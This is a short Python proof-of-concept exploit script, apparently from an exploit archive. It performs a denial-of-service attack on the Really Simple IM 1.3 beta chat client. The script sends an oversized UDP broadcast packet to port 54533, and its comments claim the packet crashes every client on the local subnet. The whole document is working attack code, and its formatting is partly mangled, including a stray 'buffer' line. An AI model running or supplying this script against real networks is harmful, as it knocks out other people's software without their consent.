#!/usr/bin/python
import socket
import sys
# Bug found: 18th July 2010# DoS proof of concept# Foundby: loneferret# Tested on Windows XP Professional SP2-SP3 & Windows XP Home SP3 # Really Simple IM verion 1.3 beta# Software: http://code.google.com/p/reallysimpleim/# Nods to exploit-db# I don't want this on injector <- notice the no leet talk.# This little application uses UDP to & send receive messages.# It broadcasts everything, and picks up everything# on port 54533.# The funny thing with this PoC, it will crash all clients# in the same subnet. Yup it's that funny. That's the only thing it does too...# No EIP, no SEH but the buffer is still in memory at the# moment of the crash. Figured I'd share anyway.#Commands# 'p' Connect and adds users to list# 'a' Disconnect message# 'b' Send message# 't' Direct message
host = '192.168.xxx.255'#Adjust broadcast address to your network
port = 54533
buffer
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind((host,0))
s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
except:
print "socket() failed"
sys.exit(1)
da = "p"
da +="W00T"+("\x41"* 10000)
s.sendto(da,(host, port))
